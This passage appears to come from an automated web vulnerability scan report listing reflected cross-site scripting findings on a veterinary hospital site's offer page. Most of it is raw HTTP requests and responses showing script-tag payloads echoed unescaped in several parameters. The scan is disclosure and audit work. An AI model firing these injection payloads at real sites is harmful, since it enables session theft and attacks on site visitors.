HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:50 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=isg82jqlearknsphgasmidgue5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=e5910"><script>alert(1)</script>83c5d7c83ea &newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid...[SNIP]...
2.65. http://www.vcahospitals.com/main/offer/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 541f7"><script>alert(1)</script>23387174e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F&541f7"><script>alert(1)</script>23387174e =1 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:22 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
m action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F&541f7"><script>alert(1)</script>23387174e =1" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.66. http://www.vcahospitals.com/main/offer/ [newmex parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the newmex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb26a"><script>alert(1)</script>f4e1c6835ca was submitted in the newmex parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0bb26a"><script>alert(1)</script>f4e1c6835ca &optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:11 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=km7obviolbecfv91k623peolv6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0bb26a"><script>alert(1)</script>f4e1c6835ca &optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB19543...[SNIP]...
2.67. http://www.vcahospitals.com/main/offer/ [optin parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e849"><script>alert(1)</script>730e752517f was submitted in the optin parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?&state=FL&optin=16e849"><script>alert(1)</script>730e752517f &guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:04 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=16e849"><script>alert(1)</script>730e752517f &guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.68. http://www.vcahospitals.com/main/offer/ [other parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c04"><script>alert(1)</script>eabbcd649dd was submitted in the other parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=91c04"><script>alert(1)</script>eabbcd649dd &petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:33 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ug4maua9n8npvts3q702mnacq3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... /www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=91c04"><script>alert(1)</script>eabbcd649dd &petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A...[SNIP]...
2.69. http://www.vcahospitals.com/main/offer/ [petage parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79d43"><script>alert(1)</script>c56d9dd6dc2 was submitted in the petage parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=79d43"><script>alert(1)</script>c56d9dd6dc2 &petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:39 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=beecinp0q16pijh2d7fv3lo156; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... hospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=79d43"><script>alert(1)</script>c56d9dd6dc2 &petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-6606...[SNIP]...
2.70. http://www.vcahospitals.com/main/offer/ [petname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d62a5"><script>alert(1)</script>8bc90a2171d was submitted in the petname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=d62a5"><script>alert(1)</script>8bc90a2171d &pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:44 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=t61kfqf8iod9f3ov4rimn1b057; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... .com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=d62a5"><script>alert(1)</script>8bc90a2171d &pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%...[SNIP]...
2.71. http://www.vcahospitals.com/main/offer/ [pettype parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6359"><script>alert(1)</script>440a5a05f49 was submitted in the pettype parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=c6359"><script>alert(1)</script>440a5a05f49 &phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
